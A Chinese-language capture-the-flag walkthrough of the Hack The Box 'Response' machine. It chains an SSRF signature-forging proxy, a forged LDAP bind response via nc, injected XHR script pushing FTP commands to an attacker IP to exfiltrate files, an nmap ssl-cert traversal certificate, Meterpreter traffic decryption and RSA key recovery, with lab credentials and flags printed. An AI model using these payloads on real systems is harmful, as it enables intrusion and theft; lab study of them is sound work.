[Meachines] [Insane] Response SSRF +LDAP劫持+CPRF+Nmap-ssl-cert目录穿越+SMTP劫持+D-Link+MSF-ELF流量解密+SSH私钥破译
字数 1311 2025-08-29 08:30:06
SSRF + LDAP劫持 + CPRF + Nmap-ssl-cert目录穿越 + SMTP劫持 + D-Link + MSF-ELF流量解密 + SSH私钥破译综合渗透教学
信息收集阶段
初始扫描
- 使用nmap和masscan进行初步扫描:
ip='10.10.11.163'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
nmap -Pn -sV -sC -p "$ports" "$ip";
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
fi;
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi
- 发现开放端口:
- 22/tcp: OpenSSH 8.2p1 Ubuntu
- 80/tcp: nginx 1.21.6 (重定向到http://www.response.htb)
子域名枚举
echo '10.10.11.163 response.htb www.response.htb' >> /etc/hosts
feroxbuster -u 'http://www.response.htb'
ffuf -u http://10.10.11.163 -H "Host: FUZZ.response.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac
echo '10.10.11.163 chat.response.htb api.response.htb proxy.response.htb' >> /etc/hosts
SSRF漏洞利用
API端点发现
- 通过http://www.response.htb/status/发现API端点
- 使用proxy.response.htb/fetch端点进行SSRF测试:
# API状态检查
curl -X POST http://proxy.response.htb/fetch \
-H "Content-Type: application/json" \
-d '{"url":"http://api.response.htb/", "url_digest":"cab532f75001ed2cc94ada92183d2160319a328e67001a9215956a5dbf10c545", "method":"GET", "session":"a9144686faaab657551013989fa61b40", "session_digest":"177ebd6ee1a551f0ef67a3e00260798b43ef18018777094f79eda47ab40de96e"}'
# 获取服务器列表
curl -X POST http://proxy.response.htb/fetch \
-H "Content-Type: application/json" \
-d '{"url":"http://api.response.htb/get_servers", "url_digest":"3ca24716672824484bd11c4ae8dfdbfef8ca2b94084c597a9d4c03fad7e28df7", "method":"GET", "session":"a9144686faaab657551013989fa61b40", "session_digest":"177ebd6ee1a551f0ef67a3e00260798b43ef18018777094f79eda47ab40de96e"}'
签名绕过技术
- 发现PHPSESSID以数组方式传递时发生错误
- /var/www/html/status/main.js.php的hash_hmac会对传入的session进行签名(sha256)
- 创建代理服务器生成有效签名:
import base64
import os.path
import re
import requests
from flask import Flask, request, Response
app = Flask(__name__)
mimetypes = {"css": "text/css", "js": "application/javascript"}
def get_digest(target):
cookies = {'PHPSESSID': target}
resp = requests.get('http://www.response.htb/status/main.js.php', cookies=cookies)
digest = re.findall("'session_digest':'([a-f0-9]+)'", resp.text)[0]
return digest
@app.route('/', defaults={'path': ''}, methods=["GET", "POST"])
@app.route('/<path:path>', methods=["GET", "POST"])
def all(path):
target = request.url
body = {
"url": target,
"url_digest": get_digest(target),
"method": request.method,
"session": "2f54d5421b84fbcf96ca7f4b7e8b28d7",
"session_digest":"628ddf8d85a8adc6f84b08362dfff13de0cb0ee4698b642333e0f94db0de64f6"
}
if request.method == "POST":
body['body'] = base64.b64encode(request.data).decode()
resp = requests.post('http://proxy.response.htb/fetch', json=body, proxies={'http':'http://127.0.0.1:8080'})
result = resp.json()
if 'error' in result:
return result
if result['status_code'] == 200:
body = base64.b64decode(result['body'])
mimetype = mimetypes.get(target.rsplit('.', 1)[-1], 'text/html')
return Response(body, mimetype=mimetype)
return resp.text
if __name__ == "__main__":
app.run(debug=True, port=8001)
LDAP劫持与认证绕过
初始认证
- 发现chat.response.htb使用LDAP认证
- 默认凭证:guest/guest
LDAP劫持
- 创建恶意LDAP响应:
echo -ne '\x30\x0C\x02\x01\x01\x61\x07\x0A\x01\x00\x04\x00\x04\x00' | nc -lvnp 389
- 修改认证请求指向攻击者控制的LDAP服务器:
{
"username":"admin",
"password":"adminhacked",
"authserver":"10.10.16.33"
}
CPRF与FTP主动模式利用
FTP凭证发现
- FTP服务器:172.18.0.2:2121
- 用户名:ftp_user
- 密码:Secret12345
利用XHR发送FTP命令
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://172.18.0.2:2121", true);
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,33,223,1\r\nLIST\r\n");
</script>
文件下载
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://172.18.0.2:2121", true);
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,33,223,1\r\nRETR creds.txt\r\n");
</script>
Nmap ssl-cert目录穿越漏洞利用
LDAP信息收集
ldapsearch -x -D "cn=admin,dc=response,dc=htb" -w "aU4EZxEAOnimLNzk3" -s sub -b "ou=servers,dc=response,dc=htb" "(objectclass=ipHost)"
创建恶意LDAP条目
dn: cn=maptnh,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: maptnh
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 10.10.16.33
设置恶意SSL证书
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/C=US/ST=home\/scryh\/.ssh\/id_rsa/O=maptnh Inc/OU=H4CK13"
配置DNS和SMTP
- 配置dnsmasq:
vim /etc/dnsmasq.conf
listen-address=10.10.16.33
address=/.maptnh.htb/10.10.16.33
mx-host=response-test.htb,maptnh.htb,0
sudo systemctl restart dnsmasq
- 启动SMTP服务器:
python -m smtpd -n -c DebuggingServer 10.10.16.33:25
D-Link文件共享利用
设置D-Link服务器
./dlink server --port 10098 --path /tmp/scryh/tran --key abcdefgh &
./dlink server --port 10099 --path /tmp/scryh/tran --key abcdefgh --reverse &
目标机连接
./dlink client --endpoint "10.10.16.33:10098" --path /home/scryh/incident_2022-3-042 --key abcdefgh &
./dlink client --endpoint "10.10.16.33:10099" --path /home/scryh/incident_2022-3-042 --key abcdefgh --reverse &
Meterpreter流量解密
提取AES密钥
bulk_extractor core.auto_update -o bulk_extractor/
cat aes_keys.txt
找到AES密钥:f2 00 3c 14 3d c8 43 6f 39 ad 6f 8f c4 c2 4f 3d 35 a3 5d 86 2e 10 b4 c6 54 ae dc 0e d9 dd 3a c5
解密脚本
#!/usr/bin/env python3
import uuid
from Crypto.Cipher import AES
from scapy.all import *
from msfconsts import tlv_types, cmd_ids
enc_types = {0: "None", 1: "AES256", 2: "AES128"}
packet_types = {0: "Req", 1: "Resp"}
aes_key = bytes.fromhex('f2 00 3c 14 3d c8 43 6f 39 ad 6f 8f c4 c2 4f 3d 35 a3 5d 86 2e 10 b4 c6 54 ae dc 0e d9 dd 3a c5')
def xor(buf, key):
return bytes([x ^ key[i % len(key)] for i, x in enumerate(buf)])
# 解密处理代码...
SSH私钥破译
发现部分私钥
从解密数据中找到部分私钥:
ntEd3KnWNpkbwp28vVgasUOq3CQBbDOQAAAMEAxwsaGXCZwMb/JH88XvGhu1Bo2zomIhaVMrbN5x4q3c7Z0u9gmkXO+NWMpX7T20l0OBEIhrW6DQOsxis/CrS5u69F6tUZjlUdNE1zIE7IFv2QurMwNL89/SnlQbe24xb+IjafKUaOPsNcpFakP4vxnKL+uw6qFoqRdSZyndgArZKDK26Z7ZzdV2ln2kyiLfokN8WbYxHeQ/7/jVBXf71BU1+Xg8X44njVp3Xf9gO6cYVaqb1xBsZ7bG8Warkycj7ZAAAADXJvb3RAcmVzcG9uc2UBAgMEBQ==
使用RsaCtfTool恢复私钥
python RsaCtfTool.py --publickey authorized_keys --dumpkey
计算缺失参数
q=int('c70b1a197099c0c6ff247f3c5ef1a1bb5068db3a2622169532b6cde71e2addced9d2ef609a45cef8d58ca57ed3db497438110886b5ba0d03acc62b3f0ab4b9bbaf45ead5198e551d344d73204ec816fd90bab33034bf3dfd29e541b7b6e316fe22369f29468e3ec35ca456a43f8bf19ca2febb0eaa168a917526729dd800ad92832b6e99ed9cdd576967da4ca22dfa2437c59b6311de43feff8d50577fbd41535f9783c5f8e278d5a775dff603ba71855aa9bd7106c67b6c6f166ab932723ed9', 16)
p = n//q
phi = (p-1)*(q-1)
d = pow(e, -1, phi)
最终权限提升
使用恢复的SSH私钥登录
ssh -i recovered_key root@response.htb
获取最终flag
- User flag:
04b2cb1b44a49538de54fa1de3c33191 - Root flag:
b7cb217e7152b4bff571b5bbaefa18da
关键知识点总结
- SSRF利用:通过签名绕过和代理服务器构造实现内部服务访问
- LDAP劫持:通过控制LDAP响应实现认证绕过
- CPRF+FTP:利用浏览器XHR发送原始FTP命令实现文件泄露
- Nmap漏洞:利用ssl-cert脚本的目录穿越读取敏感文件
- D-Link工具:实现双向文件传输绕过限制
- 流量解密:从内存转储中提取AES密钥解密Meterpreter会话
- RSA私钥恢复:通过部分私钥和数学计算恢复完整私钥
此渗透测试展示了多种高级技术的综合应用,强调了在复杂环境中需要结合多种漏洞和技术才能实现最终目标。